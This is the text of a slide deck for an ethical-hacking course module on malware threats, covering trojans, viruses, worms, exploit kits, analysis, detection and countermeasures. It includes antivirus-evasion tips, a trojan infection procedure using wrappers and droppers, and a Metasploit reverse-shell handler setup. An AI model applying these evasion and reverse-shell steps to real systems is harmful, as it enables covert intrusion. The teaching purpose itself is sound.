Ethical Hacking v10 Module 6 – Malware Threats
Ethical Hacking v10 Module 6 – Malware Threats
Malware Threats
Goals• Understand Malware/Malware Propagation
Techniques• Understand Trojan Types/How They Work• Understand Virus Types/How They Work• Understand Computer Worms• Understand Process of Malware Analysis• Understand Malware Detection Techniques• Learn Malware Countermeasures• Understand Malware Penetration Testing
Module 6.0 Malware Threats
• 6.1 Introduction to Malware• 6.2 Trojan Concepts• 6.3 Virus and Worm Concepts• 6.4 Malware Reverse Engineering• 6.5 Malware Detection• 6.6 Countermeasures• 6.7 Anti-malware Software• 6.8 Penetration Testing
6.1 Introduction to Malware
Introduction to Malware
• Malicious software that damages or disables computer systems and gives some control to the malware creator• Theft• Fraud
• Examples:• Trojan Horse• Virus• Backdoor• Worm• Rootkit• Spyware, Ransomware, Botnet, Adware, Crypter
How Malware Gets into Systems
• Instant Messenger application• IRC (Internet Relay Chat)• Removable devices• Attachments• Legitimate software packaged by a disgruntled employee• Browser and email software bugs• NetBIOS (FileSharing)• Fake programs• Untrusted sites and freeware software• Downloading files, games, and screensavers from Internet sites
Common Techniques Attackers Use to Distribute Malware on the Web• Blackhat Search Engine Optimization (SEO)
• Ranking malware pages highly in search results• Malvertising
• Embedding malware in ad-networks that appear on hundreds of legitimate sites• Compromised Legitimate Sites
• Hosing embedded malware that spreads to visitors• Social Engineered Click-jacking
• Tricking user into clicking o innocent-looking pages• Spearphishing Sites
• Impersonating legitimate organizations in an attempt to steal login credentials• Drive-by Dowloads
• Exploiting flaws in browser software to install malware by just visiting a webpage
6.2 Trojan Concepts
How Hackers Use Trojans• Delete or replace operating system’s critical files• Generate DoS attacks• Record screenshots, audio, and video of target computer• Use target computer for spamming, and blasting email messages• Download spyware, adware, and malicious files• Disable firewalls and antivirus software• Create backdoors for remote access• Infect target computer as a proxy server for relay attacks• Use target computer as a botnet to generate DDoS attacks• Steal information including passwords, security codes, credit card
information using keyloggers
Common Ports used by
Trojans
TCP Port Name of Trojan
21 Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,WinCrash
23 Tiny Telnet Server
25
Antigen, Email Password Sender, HaebuCoceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy, Kuang2 0.17A-0.30
31 Hackers Paradise80 Executor456 Hackers Paradise555 Ini-Killer, Phase Zero, Stealth Spy666 Satanz Backdoor1001 Silencer, WebEx1011 Doly Trojan1170 Psyber Stream Server, Voice
Trojan Ports(cont'd)
TCP Port Name of Trojan
1234 Ultors Trojan
1243 SubSeven 1.0 – 1.8
1245 VooDoo Doll
1492 FTP99CMP
1600 Shivka-Burka
1807 SpySender
1981 Shockrave
1999 BackDoor 1.00-1.03
2001 Trojan Cow
2023 Ripper
2115 Bugs
Trojan Ports (cont'd)
TCP Port Name of Trojan2140 Deep Throat, The Invasor2801 Phineas Phucker3024 WinCrash3129 Masters Paradise3150 Deep Throat, The Invasor3700 Portal of Doom4092 WinCrash4567 File Nail 14590 ICQTrojan5000 Bubbel5001 Sockets de Troie5321 Firehotcker
Trojan Ports (cont'd)
TCP Port Name of Trojan5400 Blade Runner 0.80 Alpha5401 Blade Runner 0.80 Alpha5402 Blade Runner 0.80 Alpha5400 Blade Runner5401 Blade Runner5402 Blade Runner5569 Robo-Hack5742 WinCrash6670 DeepThroat6771 DeepThroat6969 GateCrasher, Priority7000 Remote Grab
Trojan Ports (cont'd)
TCP Port Name of Trojan7300 NetMonitor7301 NetMonitor7306 NetMonitor7307 NetMonitor7308 NetMonitor7789 ICKiller8787 BackOfrice 20009872 Portal of Doom9873 Portal of Doom9874 Portal of Doom9875 Portal of Doom9989 iNi-Killer
Trojan Ports (cont'd)
TCP Port Name of Trojan10067 Portal of Doom10167 Portal of Doom10607 Coma 1.0.911000 Senna Spy11223 Progenic trojan12223 Hack´99 KeyLogger12345 GabanBus, NetBus12346 GabanBus, NetBus12361 Whack-a-mole12362 Whack-a-mole16969 Priority20001 Millennium
Trojan Ports (cont'd)
TCP Port Name of Trojan20034 NetBus 2.0, Beta-NetBus 2.0121544 GirlFriend 1.0, Beta-1.3522222 Prosiak23456 Evil FTP, Ugly FTP26274 Delta30100 NetSphere 1.27a30101 NetSphere 1.27a30102 NetSphere 1.27a31337 Back Orifice31338 Back Orifice, DeepBO31339 NetSpy DK31666 BOWhack
Trojan Ports (cont'd)
TCP Port Name of Trojan33333 Prosiak34324 BigGluck, TN40412 The Spy40421 Masters Paradise40422 Masters Paradise40423 Masters Paradise40426 Masters Paradise47262 Delta50505 Sockets de Troie50766 Fore53001 Remote Windows Shutdown54321 SchoolBus .69-1.11
Trojan Ports (cont'd)
TCP Port Name of Trojan
61466 Telecommando
65000 Devil
UDP Port Name of Trojan
1349 Back Ofrice DLL
31337 BackOfrice 1.20
31338 DeepBO
54321 BackOfrice 2000
6.3 Trojan Types
Types of Trojans• VNC Trojan• HTTP Trojan• ICMP Trojan• Data Hiding Trojan• Destructive Trojan• HTTPS Trojan• Botnet Trojan• Proxy Server Trojan
• Remote Access Trojan• FTP Trojan• Defacement Trojan• E-banking Trojan• Convert Trojan• Notification Trojan• Mobile Trojan• Command Shell Trojan
Command Shell Trojans• Command shell Trojan gives remote control of the command sheel on
a target computer• Trojan server is installed on the target compute that operates a port
for the attacker to connect• A client is installed on the attacker’s computer that is used to launch a
command shell on the target computer
Defacement Trojans• Resource editors all to view, edit, extract, and replace strings,
bitmaps, logos, and icons from any Windows programs• Allow view and edit of almost any aspect of a compiled Windows
program, including menus, dialog boxes, icons, etc.• Apply User-styled Custom Application (UCA) to deface Window
applications
Botnet Trojans• Botnet Trojans infect a large number of target computers across a
large geographic area to create a network of bots that are controlled through a command and control (C&C) center • Botnets are used to launch attacks on a targets including DoS,
spanning, click fraud, and financial information theft
Botnet Trojans (cont’d)• Tor-based Botnet Trojans – ChewBacca• ChewBacca Trojan has stolen data on 49,000 payment cards from 45 retailers
in 11 countries over a two month span
• Botnet Trojans – Skynet and CyberGate• Skynet - a Tor-powered trojan with DDoS, Bitcoin mining and Banking
capabilities spread through Usenet• CyberGate RAT- a powerful, fully configurable and stable Remote
Administration Tool coded in Delphi that is continuously getting developed by a experienced team• CyberGate RAT was built to be a tool for various possible applications, ranging from
assisting Users with routine maintenance tasks, to remotely monitoring children, captures regular user activities and maintain a backup of your typed data automatically
Proxy Server Trojans• Trojan Proxy is usually a standalone application that allow remote
attacker to use the target computer as a proxy to connect to the Internet• Proxy Server Trojan starts a hidden proxy server on the target
computer• Thousands of computers on the Internet are infected with proxy
servers using this technique
W3bPrOxy Tr0j4nCr34t0r (Funny Name)• W3bPrOxy Tr0j4nCr34t0r is a proxy server Trojan • Supports multi connections from many clients • Reports IP addresses and ports by email to the Trojan owner
FTP Trojans• FTP Trojans install an FTP server on the target computer that opens
FTP ports• An attacker can then connect to the target computer using FTP port
to download any files that exist on the target computer
VNC Trojans• VNC Trojan starts a VNC Server daemon in the target system • Attacker connects to the target using any VNC viewer• VNC is considered a utility which makes the VNC Trojan difficult to
detect• Hesperbot• Hesperbot is a banking Trojan which feature common functionalities,
including keystroke logging, creation of screenshots and video capture, configuring remote proxies• Creates a hidden VNC server for the attacker to connect to the target
remotely• VNC does not log the user off like RDP, therefore the attacker can connect to
the target computer while a user is working
HTTP/HTTPS Trojans• Bypass Firewall• HTTP Trojans can bypass any firewall and work in the reverse way of a straight
HTTP tunnel
• Spawn a Child Program• Executed on the internal host and spawn a child at a scheduled time
• Access the Internet• Child program appears to be a user to the firewall and is allowed to access the
Internet
HTTP Trojan – HTTP RAT• Displays ads, records personal data/keystrokes• Downloads unsolicited files, disables programs/system• Floods Internet connection and distributes threats• Tracks browsing history and activities and hijacks the browser• Makes fraudulent claims about spyware detection and removal
SHTTPD Trojan – HTTPS (SSL)• SHTTPD is a small HTTP Server that can be embedded in any program• Can be wrapped with a legitimate program• When executed it will transform the target computer into an invisible
web server
ICMP Tunneling• Covert channels are methods that an attacker can hide data in a
protocol that is undetectable• Relies on techniques called tunneling that allows one protocol to be
carried over another protocol• ICMP tunneling uses ICMP echo-request and reply to carry a payload
and silently access or control a target computer• Icmpsend
• Client computer – icmpsend <target IP Address>• ICMP Server – icmpserv -install
ICMP Tunneling Example
Remote Access Trojans• Works like remote desktop access• Attacker gains complete graphic user interface (GUI) access to the
target computer remotely• Install• Infect target computer with server.exe• Plant reverse Connecting Trojan• Trojan connect to port 80 to establish the reverse connection• Attacker has complete control over target computer
Remote Access Trojans (cont'd)• Optix Pro• MoSucker• BlackHole RAT• SSH-R.A.T.• njRAT• Xtreme RAT• DarkComet RAT• Pandora RAT• HellSpy RAT
• ProRAT• Theef
Remote Access Tools – Atelier Web Remote Commander• Allows establishment of a remote connection to a remote computer • Doesn’t install any client or supporting software on the computer
Hell Raiser RAT• HellRaiser allows an attacker to gain access to the target computer• Send pictures, popup chat messages, transfer files to and from the
target system• Completely monitor the operations performed on the target
computer
Covert Channel Trojan - CCTT• Cover Channel Tunneling Tool (CCTT) Trojan is equipped with a
number of exploitation techniques creating arbitrary data transfer channels in the data streams authorized by a network access control system• Enables attackers to get an external server shell from within the
internal network and internal to external as well• Sets a TCP/UDP/HTTP CONNECT|POST channel permitting TCP data
streams (SSH, SMTP, POP, etc.) between an external server a device that resides on the internal network
E-banking Trojans• Intercept a target’s banking
account information before it is encrypted • Sends it to the attacker’s Trojan
Command and Control center
• Steals the target’s data including credit card information • transmits it to remote hackers using
email, FTP, IRC, and other methods
Types of E-banking Trojans• TAN Grabber
• Trojan intercepts valid Transaction Authentication Number (TAN) entered by the user• Replaces the TAN with a random number that will be rejected by the bank• Attacker can use the intercepted TAN with the user’s login details
• HTML Injection• Trojan creates fake form fields on e-bank pages• Fields elicit extra information (card number, date of birth, etc.)• Attacker can use to impersonate and compromise target’s account
• Form Grabber• Trojan analyses POST requests and responses to target’s browser• Compromises the scramble pad authentication• Intercepts scramble pad input as user enters Customer Number and Personal Access
Code
E-banking Trojans – ZeuS and SpyEye• The main purpose of ZeuS and SpyEye is to steal bank and credit card
account information, FTP data, and other sensitive information from infected computers using web browsers and protected storage• SpyEye can automatically and quickly initiate online transactions• Additonal E-banking Trojans include Citadel Builder and Ice IX
Destructive Trojans – M4sT3r Trojan• M4sT3r is a very dangerous
and destructive Trojan• When executed it destroys
the operating system• Formats all local and
network drives• The user will no longer be
able to boot the computer
Notification Trojans• Notification Trojans send the location of the target’s IP Address to the
attacker• Whenever the target computer connects to the Internet, the attacker
receives a notification
Data Hiding Trojans (Encrypted Trojans)• Encryption Trojans encrypts data files on the target’s system and
renders information unusable• Written in C++
• Attackers demand a ransom or force the target/s to make purchases from their online drug stores to unlock files• Targets include• Company databases• Personal information• Vital files and folders• Financial information• Confidential documents and information
Data Hiding Trojans (Encrypted Trojans)• Encryption Trojans encrypts data files on the target’s system and
renders information unusable• Written in C++
• Attackers demand a ransom or force the target/s to make purchases from their online drug stores to unlock files• Targets include• Company databases• Personal information• Vital files and folders• Financial information• Confidential documents and information
6.4 Trojan Tools
How to Infect Systems Using a Trojan• Create a new Trojan packet using a Trojan Horse Construction Kit• Create dropper, which is part of a trojanized packet that installs the
malicious code on the target computer• Create a wrapper using wrapper tools to install the Trojan on the
target computer • Propagate the Trojan• Execute the dropper• Execute the damaging program/routine• Major Trojan Attack Paths
• User clicks on the malicious link• User opens malicious email attachments
Wrappers• A wrapper binds a Trojan executable
with an .exe application• That appears to be a game or office
application
• The two programs are wrapped together into a single file• When the user runs the wrapped .exe• It installs Trojan in the background• Then runs the wrapping application in
foreground
Dark Horse Trojan Virus Maker
Crypters• Software that is used by hackers to hide viruses, keyloggers, or tools
of any file to avoid detection by antiviruses• Can encrypt, obfuscate, and manipulate malware• Makes it harder to detect by security programs• Used by cybercriminals to create malware that can bypass security
programs • Presents itself as a harmless program until it gets installed
Types of Crypters
• Static/statistical crypters• Use different stubs to make each encrypted file unique• Having a separate stub for each client makes it easier for malicious actors to
modify or, in hacking terms, “clean” a stub once it has been detected by a security software
• Polymorphic crypters• Considered more advanced• Use state-of-the-art algorithms that utilize random variables, data, keys,
decoders, and so on• One input source file never produces an output file that is identical to the
output of another source file• Crypter services are available online for a reasonable fee ($10 - 100)
Crypter Examples• Msfvenom• AIO FUD Crypter• Hidden Sight Crypter• Galaxy Cryptor• Criogenic Crypter• Heaven Crypter• SwayzCryptor• Aegis Crypter
Creating a Malicious Using MSFVENOM
Exploit Kit• An exploit kit or crimeware toolkit is a platform to deliver exploits and
payloads • Trojans, spywares, backdoors, bots, buffer overflow scripts, etc. on
the target
Creating a Malicious Payload in Metasploit
Set Up Your Exploit Multi Handler
use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <kali IP>
set LPORT 4444
show optionsrun
Infinity• The Infinity Exploit Kit is an exploit kit that uses vulnerabilities in Mozilla
Firefox, Internet Explorer and Opera to install threats on the target computers• Malware analysts have also reported that the Infinity Exploit Kit exploits
known vulnerabilities in Web browser add-ons and platforms like Java and Adobe Flash to carry out its attacks• The Infinity Exploit Kit is used to compromise the target computers and
may be associated with other threats• The Infinity Exploit Kit Will Find and Use Any Vulnerability to Install Threats
on the PC
Other Exploit Kits• Phoenix Exploit Kit• The Phoenix Exploit Kit is a commercial crimeware tool that until fairly
recently was sold by its maker in the underground for a base price of $2,200• It is designed to booby-trap hacked and malicious Web sites so that they
impose drive-by downloads on visitors• Phoenix targets only Microsoft Windows computers
• Blackhole Exploit Kit• BlackHole is commercial crimeware designed to be stitched into hacked or
malicious sites and exploit a variety of Web-browser vulnerabilities for the purposes of installing malware of the customer’s choosing• Once an extremely popular crimeware-as-a-service offering, Blackhole was
for several years responsible for malware infections and stolen banking credentials, and likely contributed to tens of millions of dollars stolen from small to mid-sized businesses
Other Exploit Kits (cont'd)• Bleeding Life• Exploit Pack Run on Java Juice• What’s interesting about this kit is that its authors advertise that one of the
exploits included isn’t really an exploit at all: It’s a social engineering attack where the hacked page will simply abuse built-in Java functionality to ask the visitor to run a malicious Java applet
• Crimepack• A prepackaged bundle of commercial crimeware that attackers can use to
booby-trap hacked Web sites with malicious software• Another Java exploit software
Evading AntiVirus Techniques• Break the Trojan file into multiple pieces and zip into a single file• Always write the Trojan, and embed in an application• Change Trojan’s syntax• Convert .exe to a VB script• Change .exe extension to .doc.exe, .ppt.exe, .pdf.exe as Windows hides file
extension by default
• Change the content of the Trojan using hex editor and also change the checksum and encrypt the file• Never use Trojans downloaded from the web as antiviruses can
detect these with no trouble
6.5 Virus and Worm
Concepts
Introduction to Viruses• A virus is a self-replicating program that produces its own copy by
attaching itself to another program, computer boot sector, or document• Viruses are usually transmitted through file downloads, infected
removable disk drives, flash drives, and email attachments• Virus characteristics• Infects other programs• Alters data• Transforms itself• Corrupts files and programs • Encrypts itself• Self-replicates
The Life of a Virus• Design – a virus is developed using a programming code or
construction kits• Replication – viruses replicate for an amount of time and then
spreads• Launch – virus is activated by the user• Detection – virus is then detected by antivirus software• Incorporation – antivirus software continuously updates its software
to automatically eradicate the virus• Elimination – the threat of that virus is eliminated when users keep
their antivirus software up to date
Working of Viruses• Infection Phase• The virus replicates itself and attaches to an .exe file in the system
• Attack Phase• Viruses are programmed with trigger events to activate and corrupt systems
• Viruses may infect each time they are run• Viruses may run only when predefined conditions occur• Viruses may run on specific days, dates, times, events
Reasoning Behind Creating Viruses• Cause damage to an individual or organization• Receive financial benefits• Used for research projects• Play a trick• Cause vandalism• Perpetrate cyber terrorism• Distribute ideological messages (political, religious, etc.)
Indication of Virus Attack• Abnormal Activities – the system acts in an unusual and unexpected way
• Processes take more time to complete• Computer unresponsive• Drive labels change• Unable to boot operating system• Computer slows down when running normal applications
• False Positives – many glitches can result from viruses, but not all• Many antivirus alerts• Computer freezes periodically• Files and folders are missing• Hard drive accesses increase• Browser window freezes frequently
How Do Computers Become Infected• User/s download or run files from untrusted source• User/s open infected email attachments• User/s install pirated and untrusted applications• User/s do not keep operating system/s applications updated regulary• User/s do not install new versions of plug-ins when directed• User/s do not keep antivirus applications up to date
6.6 Virus Types
Ransomware• Ransomware is a type of malware that restricts access to a target
computer’s files and folders and demands an online ransom payment to the malware creators• Types• Crytorbit Ransomware• CrptoLocker Ransomware• CrptoDefense Ransomware• CryptoWall Ransomware• Police-themed Ransomware
Types of Viruses• System or Boot Sector• File• Cluster• Multipartite• Macro• Stealth/Tunneling• Encryption• Sparse Infector• Add-on
• Polymorphic• Companion/Camouflage• Intrusive• Metamorphic• Shell• Direct Action or Transient• Overwriting File• File Extension• Terminate and Stay Resident (TSR)
System or Boot Sector Viruses• System or Boot Sector Viruses• Boot sector virus moves MBR to another location on the hard disk and
copies itself to the original location of MBR• When the affected system boots, virus code is executed first and then
control is passed to the original MBR
File and Multipartite Viruses• File Viruses• Infects files which are executed or interpreted in the system including .exe,
.sys, .com, prg, .bat, .mnu, .obj, etc.• Can be either direct-action (non-resident) or memory-resident
• Multipartite Viruses• Infect the system boot sector and executable files at the same time.
Macro Viruses• Macro Viruses• Infect files create by Microsoft Word or Excel• Most are written using Visual Basic for Applications (VBA)• Infect templates or convert infected documents into template files, while
appearing normal
Cluster Viruses• Cluster Virusies• Modify directory table entries so that it points users or system processes to
the virus code rather than the actual application• Only one copy of the virus is stored on disk, but infects all applications on
the computer• Will launch itself first when any application on the computer is started after
which control is past to the actual application
Stealth/Tunneling Viruses• Stealth/Tunneling Viruses• Evade the antivirus software by intercepting requests to the operating
system• Is hidden by intercepting the antivirus software’s request to read the file
and passing the request to the virus instead of the operating system• Virus then returns an uninfected version of the file to the antivirus software
that makes it appear clean
Encryption Viruses• Encryption Viruses• Users simple encryption to encipher the code• Is encrypted with a different key for each infected file• The antivirus cannot directly detect them using signature detection
methods
Polymorphic Code• Polymorphic code• Mutates while keeping the original algorithm intact• To enable, the virus must have a polymorphic engine (mutating engine)• When well-written, no parts remain the same on each infection
Metamorphic Viruses• Metamorphic Viruses• Rewrite themselves completely every time they infect a new executable• Metamorphic code can reprogram itself by translating its own code into a
temporary representation and then back to normal code
File Overwriting or Cavity Viruses• File Overwriting or Cavity Viruses• Cavity virus overwrites a part of the host file that is constant, usually with
nulls, without increasing the length of the file and preserving functionality
Sparse Infector Viruses• Sparse Infector Viruses• Infects only occasionally, not every application that is executed• Infects only files that are a certain size• This aids in the virus not be detected
Companion/Camouflage Viruses• Companion/Camouflage Viruses• Is a computer virus that stores itself in a file that is named similar to
another program file that is commonly executed• When that file is executed, the virus will infect the computer or perform
malicious steps such as deleting the files on the user’s computer hard drive
Shell Viruses• Shell Viruses• Infects a computer by wrapping itself around code which already exists,
such as the operating system code which writes to a file• Whenever a program tries to use the enclosed code the virus code is
executed
File Extension Viruses• File Extension Viruses• Change the extensions of files• .txt is safe as it indicates a pure text file• With file extensions turned off a file may appear to be safe, but will not be
• Example: Files.txt could really be File.txt.vbs• Turn off, hide file extensions, in operating system
Add-on and Intrusive Viruses• Add-on viruses• Append their code to the host code without making any changes to the host
code• Inserts code at the beginning of the valid code
• Intrusive viruses• Overwrite the host code partly or completely with the viral code
Transient, Terminate, and Stay Resident Viruses• Transient• Disappears after running
• TSR• Loads itself into memory and stays there
Virus Hoaxes and Fake Antiviruses• Virus Hoaxes• Hoaxes are false alarms claiming reports
about a non-existing virus which may contain virus attachments• Fake warning message propagating to users
not to open a specific email that will damage one’s system
• Fake Antiviruses• Attacker disguise malware as an antivirus and
trick user/s into installing on one’s system• Fake antiviruses damage target systems and
can be consider malware
Computer Worms• Malicious programs that operate across network connections
without the need for human involvement• Most worms replicate and spread across the network to consume
resources• Some worms carry a damaging payload• Worm payloads are often used to install backdoors, turning infected
computers into zombies and creating bobnets
Differences between Virus and Worm• Worms self-replicate, viruses don’t• Worms cannot attach themselves to other programs• Worms use file/information transport features to spread through
infected networks automatically, viruses don’t• Type of worm – Ghost Eye Worm• Worm Maker – Internet Work Maker Thing
6.7 Malware Analysis
Sheep Dip Computer• Sheep dipping is an analysis of incoming messages/files for malware• Sheep dip computers have port, file, and network monitors and
anti-virus software• Sheep dip computers have a strictly controlled connection to the
network
Antivirus Sensor System• Computer software that identifies/analyzes malicious code threats• Used in conjunction with sheep dip computers
Malware Analysis• Preparing test bed by:• Isolating system• Disabling shared folders/guest isolation• Copying malware to guest O/S
Malware Analysis1. Performing static analysis while malware is inactive2. Collect information concerning:• String values found in binary• Packaging/compressing technique
3. Set up network connection and ensure there are no errors4. Run virus and monitor process actions/system information5. Record network traffic information6. Determine which files have been added, which processes have
been spawned, and which registry changes have been made7. Collect information on service requests, DNS information,
incoming/outgoing connection attempts
Online Malware Analysis Services• Anubis: Analyzing Unknown Binaries• Avast! Online Scanner• Malware Protection Center• ThreatExpert• Dr. Web Online Scanners• Metascan Online• Bitdefender QuickScan• UploadMalware.com• Online Malware Scanner• ThreatAnalyzer• VirusTotal
Various Analysis Services• Trojan Analysis• NeverQuest
• Virus Analysis• Ransom Cryptolocker
• Worm Analysis• Darlloz
6.8 Malware Reverse
Engineering
Approaches to Reverse Engineering Malware
• Reverse engineer • use a hex dumper to look for bit patterns• Use disassembler to read executable instructions in text format
• Examine the malware’s exploitation techniques• If the malware obfuscates itself, focus on reverse engineering on ly the new
parts• Look for mistakes in ransomware encryption implementation• Look for command & control activity• Categorization and clustering
• Do broad stroke analysis on bulk samples rather than a deep dive into a single sample
Techniques
• Static analysis• Analyze binaries without actually running them• Look at file metadata, disassemble or decompile the executable
• Dynamic analysis• Run the executable in a sandboxed environment
• Automated analysis• Use automated tools • Be careful that they don’t miss anything!
• Manual analysis• Use if the malware contains anti-debugging routines or anti-analysis
mechanisms
Malware Analysis Tools• Knowledge of Assembly language• Disassembler – IDA Pro• Debugger – OllyDbg, WinDbg• System Monitor – Process Monitor, RegShot. Process Explorer• Network Monitor – TCP View, Wireshark• Packer Identifier – PEID• Unpacking Tools – Qunpack. GUNPacker• Binary Analysis Tools – PE Explorer, Malcode Analysts Pack• Code Analysis Tools – LordPE, ImpRec
IDA Pro Example
6.9 Malware Detection
How to Detect Trojans• Scan for open ports that are suspicious• Scan for startup programs that are suspicious• Scan for running processes that are suspicious• Scan for files/folders that are suspicious• Scan for network activities that are suspicious• Scan for registry entries that are suspicious• Scan for device drivers that are suspicious• Scan for O/S files that have been suspiciously modified• Scan for Windows services that are suspicious• Run a Trojan scanner
Scanning for Suspicious Ports• Trojans open ports that are unused and connect to Trojan handlers• Watch for connections to unknown/suspicious IP addresses
Ports Monitoring Tools• TCPView• CurrPorts
Scanning for Suspicious Services• Trojans make themselves look like valid Windows services or hide
their processes• Some Trojans use PEs to inject into processes• Processes look legitimate and help bypass firewalls• Trojans can hide processes using rootkit methods• Process monitoring tools can be used to identify hidden
backdoors/Trojans
Services Monitoring Tools• Process Explorer• System Explorer• HijackThis• Autoruns for Windows• KillProcess• Security Task Manager• Yet Another (remote) Process Monitor• MONIT• ESET SysInspector• OpManager
HijackThis Example
Scanning for Suspicious Registry Entries• Windows automatically executes instructions in certain registry
sections• Suspicious entries found when conducting registry scan might be
Trojan infection• Trojans inject instructions into certain registry sections to execute
malicious actions
Registry Entries Monitoring Tools• RegScanner• Reg Organizer• Registry Viewer• Comodo Cloud Scanner• Buster Sandbox Analyzer• All-Seeing Eyes• MJ Registry Watcher• Active Registry Monitor• Regshot• Registry Live Watch• Alien Registry Viewer
Scanning for Suspicious Device Drivers• Trojans end up installed along with device drivers from
unknown/untrusted sources• The drivers are used to avoid detection• Scan all drivers to ensure they are trusted/genuine
Device Drivers Monitoring Tools• DriverView• Driver Detective• Unknown Device Identifier• DriverGuide Toolkit• InstalledDriversList• Driver Magician• Driver Reviver• ServiWin• Double Driver• My Drivers• DriverEasy
Scanning for Suspicious Windows Services• Trojans that spawn Windows services allow attackers to control
virtual machine/send malicious instructions remotely• Trojans rename all malicious processes to look genuine• Trojans use rootkit techniques to manipulate certain registry keys to
hide processes
Windows Services Monitoring Tools• Windows Service Manager
(SrvMan)• SMART Utility• Netwrix Service Monitor• PC Services Optimizer• ServiWin• Windows Service Manager Tray• AnVir Task Manager• Process Hacker• Free Windows Service Monitor
Tool• Nagios XI• Service+
Scanning for Suspicious Startup Programs• Check registry for startup program entries• Check locally automated device drivers• Check boot.ini• Check automatically started Windows services• Check the startup folder
Suspicious Startup Program Tools• Security AutoRun• Autoruns for Windows• ActiveStartup• StartEd Pro• Startup Delayer• Startup Manager• PCTuneUp Free Startup Manager• Disable Startup• WinPatrol• Chameleon Startup Manager• Startup Booster
Scanning for Suspicious Files and Folders• Trojans generally modify the files/folders of a system• Tools to identify changes in the system include:• SIGVERIF• FCIV• TRIPWIRE
File and Folder Integrity Checkers• FastSum• WinMD5• Advanced CheckSum Verifier (ACSV)• Fsum Frontend• Verisys• Another File Integrity Checker (AFICK)• FileVerifier++• PA File Sight• CSP File Integrity Checker• ExactFile• OSSEC• Checksum Verifier
Scanning for Suspicious Network Activities• Trojans send sensitive information to attackers by connecting back
to the handler• Network scanners/packet sniffers can monitor traffic to malicious
remote address• Tools like Capsa can monitor traffic for suspicious activity via the
web• Capsa is a network analyzer that gives detailed information on
potential Trojan activities
6.10 Malware Countermeasures
Trojan Countermeasures• Do not open email attachments from unknown senders• Ensure patches/security updates are installed• Ensure unnecessary ports at host firewall are blocked• Conduct antivirus scan of all DVDs/CDs• Do not accept programs via IM• Ensure desktop permissions are restricted
Trojan Countermeasures (cont’d)• Ensure weak default configurations settings are hardened and
unused functions are disabled• Do not blindly type commands or use pre-made scripts/programs• Ensure internal traffic is monitored for encrypted traffic/unusual
ports• Ensure the file integrity of each workstation is consistently managed• Do not download/execute apps from untrusted sources• Regularly run host-based anti-virus, intrusion detection, and firewall
software
Backdoor Countermeasures• Majority of commercial antivirus software can scan for/detect
backdoor programs• Ensure users know not to install apps from untrusted sources• Ensure use of anti-virus tools to identify/eliminate backdoor
programs
Virus and Worms Countermeasures• Ensure installation of anti-virus software that identifies/eliminates
infections as soon as they appear• Follow all instructions with downloading programs/files from
Internet• Ensure an anti-virus policy is in place and all staff has it• Do not open attachments from unknown senders• Ensure anti-virus software is regularly updated• Ensure regular scans of all drives are conducted• Ensure regular backup of data• Check all programs/disks with updated anti-virus before using
Virus and Worms Countermeasures (cont’d)• Ensure approval of all executable code received by organization• Ensure disk cleanup, defragmentation, and registry scanner are run
weekly• Avoid booting machine with an infected boot disk• Ensure firewall is on when using O/S in Windows XP• Keep updated on latest virus threats• Ensure anti-spyware/adware is run weekly• Ensure all CDs/DVDs are checked for infection• Avoid opening files that have multiple types of file extensions• Turn on popup blocker and use an Internet firewall• Take extra care with files received via IM
Anti-Trojan Software• TrojanHunter• Emsisoft Anti-Malware• Anit Malware BOClean• Anti Hacker• XoftSpySE• SPYWAREfighter• Malwarebytes Anti-Malware
Premium• SUPERAntiSpyware
• Trojan Remover• Twister Antivirus• STOPzilla AnitMalware• ZeroSpyware
Antivirus Tools• Immunet• AVG Antivirus• BitDefender• Kaspersky Anti-Virus• Trend Micro Titanium Maximum Security• Norton AntiVirus• F-Secure Anti-Virus• avast! Pro Antivirus 2014• McAfee AntiVirus Plus 2014• ESET Smart Security 7• Total Defense Internet Security Suite
6.11 Malware Penetration
Testing
Pen Testing for Trojans and Backdoors• Scanning for open ports• Scanning for Processes that are running• Scanning for entries in the registry• Scanning for installation of device drivers• Scanning for Windows services• Scanning for startup programs• Scanning for files/folders• Scanning for activities on the network• Scanning for O/S file modification• Running Trojan Scanner• Documenting findings
Pen Testing for Trojans and Backdoors (cont’d)• When a Trojan is found:• Isolating machine from the network• Update and run anti-virus or use another anti-virus program
Pen Testing for Viruses• Testing for suspicious behavior in a system• Is anti-virus installed?• Is anti-virus updated?• Is real-time scanning enabled?
• Scanning for running processes• Scanning for changes to registry entries• Checking Windows services• Checking startup programs• Checking integrity of files/folders• Checking modification of O/S files
Pen Testing for Viruses (cont’d)• When suspicious activity is found:• Ensuring system isolation• Running anti-virus in safe mode
• When a virus is found:• Installing a different anti-virus program• Scanning a second time for system viruses
• When a virus is found:• Formatting system with clean copy of O/S• Documenting findings
Malware Threats Review
• Malware is malicious software that disables/damages computer systems
• Trojan is a program that hides malicious code inside seemingly normal data/programming
• A Trojan executable is bound to .EXE apps using a wrapper
• An exploit/crimeware kit delivers exploits/payload to target system
• A virus is a self-replicating program• A worm is a more advanced type of virus that
does not need to be attached to another file• Viruses are categorized based on what/how they
infect• Best defense against Trojans/viruses is
awareness/prevention• Use anti-Trojan/anti-virus tools to
identify/eliminate Trojans/viruses
Lab 6: Malware Threats